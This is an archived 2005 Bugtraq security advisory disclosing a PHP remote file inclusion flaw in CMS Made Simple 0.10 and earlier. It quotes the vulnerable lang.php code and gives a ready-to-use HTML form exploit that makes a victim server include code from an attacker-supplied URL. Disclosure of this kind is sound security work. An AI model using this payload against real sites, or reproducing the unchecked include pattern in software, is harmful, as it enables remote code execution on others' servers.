lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: 31 Aug 2005 19:18:04 -0000
From: groszynskif@...il.com
To: bugtraq@...urityfocus.com
Subject: CMS Made Simple <= 0.10 - PHP injection


   -- == -- == -- == -- == -- == -- == -- == -- == -- == --
   Name: CMS Made Simple - PHP injection 
   Version <= 0.10
   Homepage: http://www.cmsmadesimple.org/

   Author: Filip Groszynski (VXSfx)
   Date: 31 August 2005
   -- == -- == -- == -- == -- == -- == -- == -- == -- == --

   Background:

	CMS Made Simple is an easy to use content managment
   system for simple stable content site. Uses PHP, MySQL
   and Smarty templating system.

   --------------------------------------------------------
   
   Vulnerable code exist in ./admin/lang.php:

   <?php
 	...
	$current_language = "en_US";
	#Only do language stuff for admin pages
[!]	if (isset($CMS_ADMIN_PAGE)) {
		...
		#Check to see if there is already a language in use...
		if (isset($_POST["change_cms_lang"])) {
[!]			$current_language = $_POST["change_cms_lang"];
			setcookie("cms_language", $_POST["change_cms_lang"]);
		} else if (isset($_COOKIE["cms_language"])) {
			$current_language = $_COOKIE["cms_language"];
		}
		else {
			...
		}

		#Ok, we have a language to load, let's load it already...
		if (isset($nls['file'][$current_language])) {
			foreach ($nls['file'][$current_language] as $onefile) {
[!]				include($onefile);
			}
		}
		...
	}
	...
   ?>
   --------------------------------------------------------

   Exploit:

	example.html:
	  <form action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>
	  <input type=hidden name=change_cms_lang value=vx>
	  <input type=submit name=test VALUE="do it">
	  </form>
	EOF

   --------------------------------------------------------

   Contact:

       Author: Filip Groszynski (VXSfx)
       Location: Poland <Warsaw>
       Email: groszynskif <|> gmail <|> com

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ